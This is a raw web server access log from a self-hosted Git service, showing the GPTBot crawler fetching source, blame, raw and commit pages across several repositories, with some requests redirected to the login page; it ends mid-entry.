"/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 11532] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 10425] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fpython3" [Client 74.7.227.38] [Length 23655] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 22027] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js" -[17/Feb/2026:15:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 11543] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10941] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" -[17/Feb/2026:15:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 11435] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:15:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 10416] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:15:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9981] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:15:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 10415] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 25198] [Gzip 12.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 22429] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:15:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:15:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 11073] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 10421] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:15:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:15:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:15:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fdotenv" [Client 74.7.227.38] [Length 24082] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fuvicorn" [Client 74.7.227.38] [Length 24085] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fstatic%2fjs%2fapp.js" [Client 74.7.227.38] [Length 37481] [Gzip 7.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:15:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:15:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10195] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js" -[17/Feb/2026:15:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm" [Client 74.7.227.38] [Length 10441] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:15:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fnotifier.py" [Client 74.7.227.38] [Length 29697] [Gzip 6.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" -[17/Feb/2026:15:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fcalculator.py" [Client 74.7.227.38] [Length 23606] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" -[17/Feb/2026:15:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fstorage.py" [Client 74.7.227.38] [Length 22440] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" -[17/Feb/2026:15:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json?display=source" [Client 74.7.227.38] [Length 11028] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" -[17/Feb/2026:15:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11868] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" -[17/Feb/2026:15:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11871] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" -[17/Feb/2026:15:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2findex.html" [Client 74.7.227.38] [Length 67420] [Gzip 10.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:15:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" -[17/Feb/2026:15:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" -[17/Feb/2026:15:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 10960] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm" -[17/Feb/2026:15:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm" [Client 74.7.227.38] [Length 10567] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm" -[17/Feb/2026:15:26:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm" -[17/Feb/2026:15:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm" -[17/Feb/2026:15:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data" [Client 74.7.227.38] [Length 11084] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm" -[17/Feb/2026:15:26:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm" -[17/Feb/2026:15:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm" -[17/Feb/2026:15:26:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm" -[17/Feb/2026:15:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm" -[17/Feb/2026:15:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" -[17/Feb/2026:15:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" -[17/Feb/2026:15:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 